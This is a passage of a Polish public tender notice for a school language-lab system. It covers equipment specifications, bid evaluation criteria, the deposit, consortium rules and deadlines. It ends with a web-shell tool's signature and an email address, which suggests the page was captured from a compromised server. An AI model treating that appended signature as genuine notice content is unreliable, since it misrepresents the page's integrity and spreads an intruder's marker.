klasie:<br/>a)	cztery panele w zestawie, wymiar jednego panelu 120 x 250 cm,<br/>b)	konfiguracja ustawienia pion/poziom (zależnie od wybranej grafiki),<br/>c)	wymagana rozdzielczość użytych grafik to 300 DPI (format: wys. x szer. px = 16 000 000 px, np. 4 000 x 4000 px ; 4 500 x 3500 px).<br/>5)	Stanowisko ucznia – 12 szt. – dotykowy pulpit nie posiadający ruchomych elementów, montowany w blacie biurka uczniowskiego i umożliwiający:<br/>a)	cyfrową regulację głośności słuchawek,<br/>b)	zgłoszenie ucznia – prośba o pomoc do nauczyciela,<br/>c)	możliwość wyłączenia przez nauczyciela dostępu do regulacji głośności przez ucznia indywidualnie lub globalnie,<br/>d)	gniazdo DIN do podłączenia słuchawek z mikrofonem,<br/>e)	wejście audio (jack) do odsłuchu dźwięku z podłączonego źródła – np. rejestratora cyfrowego, dyktafonu, komputera,<br/>f)	wyjście audio (jack) do nagrywania prowadzonej konwersacji na podłączonym rejestratorze – np. komputerze,<br/>g)	wskaźnik poziomu głośności słuchawek,<br/>h)	wskaźnik LED zgłoszenia, sygnalizuje naciśnięcie przycisku,<br/>i)	wskaźnik LED podsłuchu, sygnalizuje o włączonym podsłuchu ucznia, sygnalizacja jest możliwa do wyłączenia przez nauczyciela,<br/>j)	wskaźnik LED grupy, sygnalizuje dołączenie ucznia do grupy, w trybie pracy Quiz spełnia funkcję sygnalizacji grup nieparzystych i parzystych,<br/>k)	wskaźniki i przyciski dotykowe wykorzystywane do obsługi testów:<br/>	wskaźnik LED grupy, sygnalizuje kolorem przyporządkowanie do grupy: niebieski – nieparzyste, czerwone – parzyste,<br/>	5 wielokolorowych przycisków wariantów odpowiedzi które jednocześnie sygnalizują zmianą koloru wybranie odpowiedzi.<br/>6)	Zestaw do bezprzewodowego sterowania pracownią z urządzeń mobilnych – 1 szt.:<br/>a)	tablet o przekątnej 9,5&#34;,<br/>b)	router do zestawienia wewnętrznej sieci Wifi.<br/>7)	Oprogramowanie – powinno umożliwiać sterowanie wszystkimi funkcjami pracowni za pomocą tabletu z dowolnym systemem operacyjnym. <br/>a)	Realizowane funkcje: <br/>	Tworzenie list uczniów.<br/>	Możliwość importu listy uczniów z większości dostępnych na rynku dzienników elektronicznych (pliki SOU, XML, CSV).<br/>	Możliwość sortowania uczniów po liczbie porządkowej/nazwisku/numerze stanowiska.<br/>	Przyporządkowanie uczniów z listy do numerów stanowisk.<br/>	Timer odmierzający czas pracy.<br/>	Możliwość zdefiniowania ilości przycisków symbolizujących stanowiska uczniów w zależności od liczebności klas.<br/>	Możliwość zdefiniowania minimalnej i maksymalnej ilości grup uczniowskich.<br/>	Możliwość zdefiniowania liczby używanych wejść audio.<br/>	Przypisanie nazw własnych kolejnym wejściom audio.<br/>	Cyfrowa, niezależna regulacja siły głosu dla każdego ucznia osobno lub dla wszystkich łącznie (uwzględnia potrzeby uczniów słabo słyszących i niedosłyszących).<br/>	Cyfrowa, niezależna regulacja głośności 8 wejść dźwięku.<br/>	Cyfrowa regulacja głośności wyjść do nagrywania.<br/>b)	Tworzenie i edytowanie grup polega na przeciąganiu ikonek uczniów w odpowiednie miejsca w oknie oprogramowania sterującego (Drag&amp;Drop).<br/>	Dowolny podział uczniów na grupy o dowolnej liczebności (16 grup).<br/>	Dowolne zestawianie uczniów w pary (16 par).<br/>	Podział na pary/grupy może odbywać się automatycznie lub ręcznie.<br/>	Automatyczne podziały uczniów na pary, trójki, czwórki – do wyboru kolejno stanowiskami lub losowo.<br/>	Nauczyciel może dowolne konfiguracje uczniów zapamiętać do późniejszego użycia za pomocą ośmiu programowalnych przycisków umożliwiających szybką konfigurację klasy, którym będzie odpowiadał odpowiedni, pożądany podział na grupy i przypisane źródła dźwięku z nadaniem nazw przyciskom programowalnym.<br/>	Możliwość podłączenia 8 urządzeń audio z opcją dystrybuowania dźwięku z każdego wejścia do oddzielnej grupy (8 grup jednocześnie odsłuchuje RÓŻNE programy).<br/>	Niezależna praca w zestawionych grupach.<br/>	Dowolne przemieszczanie uczniów pomiędzy grupami, za pomocą szybkiego przesunięcia ikonki.<br/>	Podsłuch przez nauczyciela dowolnego ucznia, pary lub grupy.<br/>	Wysyłanie programu/audycji z dowolnego źródła do wybranych grup.<br/>	Prowadzenie wykładu przez wbudowany wzmacniacz i głośniki.<br/>	Włączenie i wyłączenie podsłuchu własnego głosu.<br/>	Włączenie i wyłączenie podsłuchu własnego głosu dla uczniów.<br/>	Zapis pracy (rozmów) na magnetofonie cyfrowym lub komputerze.<br/>c)	Przykładowe możliwości pracy z uczniami:<br/>	Podział uczniów na losowe pary niezależnie konwersujące ze sobą.<br/>	Podział uczniów na losowe czwórki, każda czwórka pracuje z innym programem audio.<br/>	Podział uczniów na dowolne grupy które jednocześnie realizują własne programy (np. grupa A dyskutuje z nauczycielem, grupa B słucha audycji i dyskutuje, w grupie C uczeń tłumaczy audycję a pozostali w grupie słuchają).<br/>	Konwersacja nauczyciela z uczniem, parą lub grupą, konwersacji mogą przysłuchiwać się osoby nie biorące w niej udziału.<br/>	Podsłuch przez nauczyciela dowolnego ucznia lub grupy.<br/>	Konwersacja nauczyciela z dowolnym uczniem lub grupą.<br/>8)	Rejestrator cyfrowy dwuścieżkowy (software) 1 szt. – oprogramowanie magnetofonu cyfrowego, dwuścieżkowego:<br/>a)	Jednoczesne odtwarzanie dwóch plików dźwiękowych.<br/>b)	Jednoczesny zapis jednego pliku dźwiękowego i odtwarzanie innego pliku.<br/>c)	10 zakładek wyodrębniających część zapisu.<br/>d)	Wybór prędkości odtwarzania.<br/>e)	Graficzne przedstawienie przebiegu dźwięku (oscyloskop) i porównanie z oryginałem.<br/>f)	Zapis dźwięku słyszanego w słuchawkach i własnego głosu na dwóch oddzielnych ścieżkach.<br/>9)	Wymagania dodatkowe:<br/>a)	Dostęp do panelu internetowego skąd można pobierać:<br/>	przykładowe scenariusze lekcji dla języka angielskiego i niemieckiego, opracowane na różne poziomy edukacyjne (minimum 25 scenariuszy dla języka angielskiego i 25 dla niemieckiego),<br/>	aktualne materiały, instrukcje, programy, filmy instruktażowe z obsługi pracowni.<br/>b)	Gwarancja na pracownię i słuchawki 60 miesięcy.<br/>c)	Certyfikat CE.<br/>d)	Certyfikaty na meble wydane przez jednostkę certyfikującą.<br/>e)	Nieodpłatne aktualizacje oprogramowania co najmniej przez okres gwarancji na pracownię.<br/>f)	Dostarczenie urządzeń, instalacja w miejscu wskazanym przez Zamawiającego, rozruch technologiczny.<br/>c. d. w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31710000-6 - Sprzęt elektroniczny</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Maksymalna liczba punktów w danym kryterium równa jest określonej wadze kryterium w %.<br/>2.	Ocena łączna stanowi sumę punktów uzyskanych w ramach wszystkich kryteriów. Uzyskana liczba punktów zaokrąglona będzie do drugiego miejsca po przecinku.<br/>3.	Przyznawanie liczby punków poszczególnym ofertom będzie się odbywać według następujących zasad:<br/>1)	Cena oferty.<br/>Ocenie zostanie poddana cena brutto oferty obliczona przez Wykonawcę zgodnie z przepisami prawa – podana w Formularzu oferty (stanowiącym Załącznik nr 1 do SWZ). Liczba punktów, którą można uzyskać w tym kryterium zostanie obliczona według wzoru:<br/>najniższa cena brutto spośród złożonych ofert<br/>liczba punktów = ----------------------------------------- x 60 pkt.<br/>cena brutto oferty ocenianej<br/>2)	Termin płatności faktury.<br/>Termin płatności nie krótszy niż 7 dni i nie dłuższy niż 30 dni od dnia przedłożenia Zamawiającemu prawidłowo wystawionej faktury VAT. Zamawiający dokona stosownego obliczenia na podstawie wypełnionego formularza oferty (stanowiącego załącznik nr 1 do SWZ) i złożonej w nim deklaracji Wykonawcy o terminie płatności. Liczba punktów, jaką można uzyskać w tym kryterium zostanie obliczona na podstawie poniższego wzoru:<br/> termin płatności w ofercie ocenianej<br/>liczba punktów = ---------------------------------------------------- x 30 pkt.<br/>najdłuższy termin płatności spośród złożonych ofert<br/>3)	Aspekt społeczny.<br/>Zatrudnienie lub oddelegowanie osoby niepełnosprawnej do realizacji zamówienia zatrudnionej już u Wykonawcy na podstawie umowy o pracę – 10 punktów.<br/>Zamawiający rozumie przez osobę niepełnosprawną – osobę spełniającą warunki uzyskania statusu niepełnosprawności określone w ustawie z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz.U. z 2023 poz. 100 z późn. zm.) lub we właściwych przepisach państw członkowskich Unii Europejskiej, Europejskiego Obszaru Gospodarczego lub państw, z którymi UE zawarła umowy o równym traktowaniu przedsiębiorców w dostępie do zamówień publicznych. <br/>W ramach kryterium oceny ofert punktowane będzie zatrudnienie lub oddelegowanie do realizacji zamówienia 1 osoby niepełnosprawnej (w rozumieniu ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz.U. z 2023 poz. 100 z późn. zm.) zatrudnionej już u Wykonawcy, na podstawie umowy o pracę na co najmniej ¼ etatu.<br/>Jeżeli wykonawca w ofercie zaoferuje zatrudnienie/oddelegowanie 1 osoby niepełnosprawnej otrzyma 10 pkt. W przypadku braku w ofercie deklaracji, Zamawiający nie przyzna Wykonawcy punktów w tym kryterium.<br/>Zamawiający wprowadził w/w kryterium w celu zastosowania preferencji dla Podmiotów Ekonomii Społecznej zgodnie z §19 ust. 2 umowy o dofinansowanie projektu.<br/>4.	Zamówienie zostanie udzielone Wykonawcy, który uzyska najwyższą liczbę punktów w wyniku oceny oferty. <br/>5.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>6.	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>7.	Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 6, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>8.	Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>9.	Komisja Przetargowa sprawdzi czy oferta spełnia warunki i wymogi ustawy Pzp i SWZ.<br/>10.	W toku badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert.<br/>c. d. w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości:<br/>1)	Część nr 1 – 800,00 zł (słownie: osiemset złotych 00/100);<br/>2)	Część nr 2 – 2.000,00 zł (słownie: dwa tysiące złotych 00/100);<br/>3)	Część nr 3 – 300,00 zł (słownie: trzysta złotych 00/100).<br/>2.	Wadium można wnieść w formach przewidzianych w art. 97 ust. 7 ustawy Pzp.<br/>3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.<br/>4.	Wadium w pieniądzu należy wnieść na konto Zamawiającego: Bank Spółdzielczy Sławno Nr 50 9317 0002 0000 3131 2000 0030 z dopiskiem „Wadium na dostawę sprzętu elektronicznego – Część nr ……”.<br/>5.	W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.<br/>6.	W przypadku wniesienia wadium w formie innej niż pieniądz – Wykonawca przekazuje Zamawiającemu oryginał dokumentu w postaci elektronicznej.<br/>7.	Niewniesienie wadium w terminie lub w sposób inny niż określony w SWZ skutkowało będzie odrzuceniem oferty Wykonawcy.<br/>8.	Zamawiający dokonuje zwrotu wadium zgodnie z postanowieniami art. 98 ustawy Pzp. <br/>9.	Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.<br/>10.	Zamawiający zatrzymuje wadium wraz z odsetkami w przypadkach określonych w art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy wspólnie ubiegający się o zamówienie:<br/>	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania;<br/>	muszą ustanowić Pełnomocnika Wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich dokumentów;<br/>	pełnomocnictwo musi jednocześnie wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną, fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów, wszelka korespondencja prowadzona będzie <br/>z Pełnomocnikiem;<br/>	przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający może wezwać do przedstawienia umowy regulującej współpracę tych Wykonawców.<br/>2.	Oferta wspólna, składana przez dwóch lub więcej Wykonawców powinna spełniać następujące wymagania:<br/>1)	musi być zgodna z postanowieniami SWZ; <br/>2)	sposób składania dokumentów w przypadku składania oferty wspólnej:<br/>a)	dokumenty wspólne, takie jak: <br/>	oferta (Załącznik nr 1 do SWZ);<br/>	oświadczenie wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO (Załącznik nr 5 do SWZ);<br/>podpisują wszyscy członkowie konsorcjum lub Pełnomocnik (Lider) w imieniu całego konsorcjum.<br/>b)	dokumenty, takie jak: <br/>	oświadczenie o spełnianiu warunków udziału w postępowaniu i braku podstaw do wykluczenia (Załącznik nr 4 do SWZ);<br/>składa każdy z partnerów konsorcjum w imieniu swojej firmy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość dokonania zmiany postanowień umowy na podstawie art. 455 ustawy Pzp, które zostaną wyrażone w formie pisemnego aneksu pod rygorem nieważności i mogą nastąpić wyłącznie w następujących sytuacjach: <br/>1)	wprowadzanie istotnych zmian do przedmiotu zamówienia spowodowanych uwarunkowaniami formalno – prawnymi lub technicznymi, bez konieczności zwiększenia wynagrodzenia należnego Wykonawcy; <br/>2)	zmniejszenia zakresu realizacji prac – dostaw, w przypadku wystąpienia zmiany okoliczności powodującej że:<br/>a)	wykonanie części zakresu prac nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawierania umowy lub <br/>b)	wykonanie części zakresu prac nie jest możliwe, z przyczyn nie leżących po stronie Zamawiającego i Wykonawcy; <br/>3)	zmiany kwoty i terminu wykonania umowy, w przypadku: <br/>a)	wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, <br/>b)	wniesienia przez Zamawiającego istotnej zmiany, na podstawie której Wykonawca wykonuje przedmiot umowy, przez co niemożliwe jest dotrzymanie terminu o którym mowa w umowie, <br/>c)	wstrzymanie realizacji przedmiotu umowy przez Zamawiającego nie wynikające z przyczyn leżących po stronie Wykonawcy, <br/>d)	wyrażenia zgody przez Zamawiającego na skrócenia terminu realizacji, <br/>e)	wystąpienia opóźnienia w uzyskiwaniu decyzji i uzgodnień wydawanych przez inne organy w stosunku do terminów przewidzianych ustawowo lub w stosunku do innych przepisów z przyczyn nie leżących po stronie Wykonawcy, <br/>f)	w sytuacji opóźnienia przez Zamawiającego przekazania danych na podstawie, których Wykonawca realizuje umowę. <br/>4)	w zakresie zmiany wynagrodzenia, zwłaszcza w sytuacji zmniejszenia zakresu realizacji prac projektowych, zmiany stawki obowiązującego podatku od towarów i usług (VAT). <br/>2. Warunkiem dokonania zmian, o których mowa w ust. 1, jest złożenie wniosku przez stronę inicjującą zmianę zawierającego: <br/>1)	opis propozycji zmiany, <br/>2)	uzasadnienie zmiany, <br/>3)	obliczenie kosztów zmiany zgodnie z zasadami określonymi w umowie, jeżeli zmiana będzie miała wpływ na wynagrodzenie Wykonawcy, <br/>4)	opis wpływu zmiany na harmonogram realizacji i fakturowania oraz termin wykonania umowy. <br/>3. Wykonawca nie będzie uprawniony do żądania przedłużenia terminu wykonania umowy i zwiększenia wynagrodzenia, jeżeli zmiana jest wymuszona uchybieniem czy naruszeniem umowy przez Wykonawcę – w takim przypadku koszty dodatkowe związane takimi zmianami ponosi Wykonawca. <br/>4. Powyższe zmiany nie mogą być niekorzystne dla Zamawiającego.<br/>5. Poza przypadkami opisanymi w niniejszym paragrafie, zmiana umowy może nastąpić w przypadkach przewidzianych w art. 455 ust. 1 pkt. 2 – 4 i ust. 2 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-24 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop („przeciągnij” i „upuść”) służące do dodawania plików.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-24 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com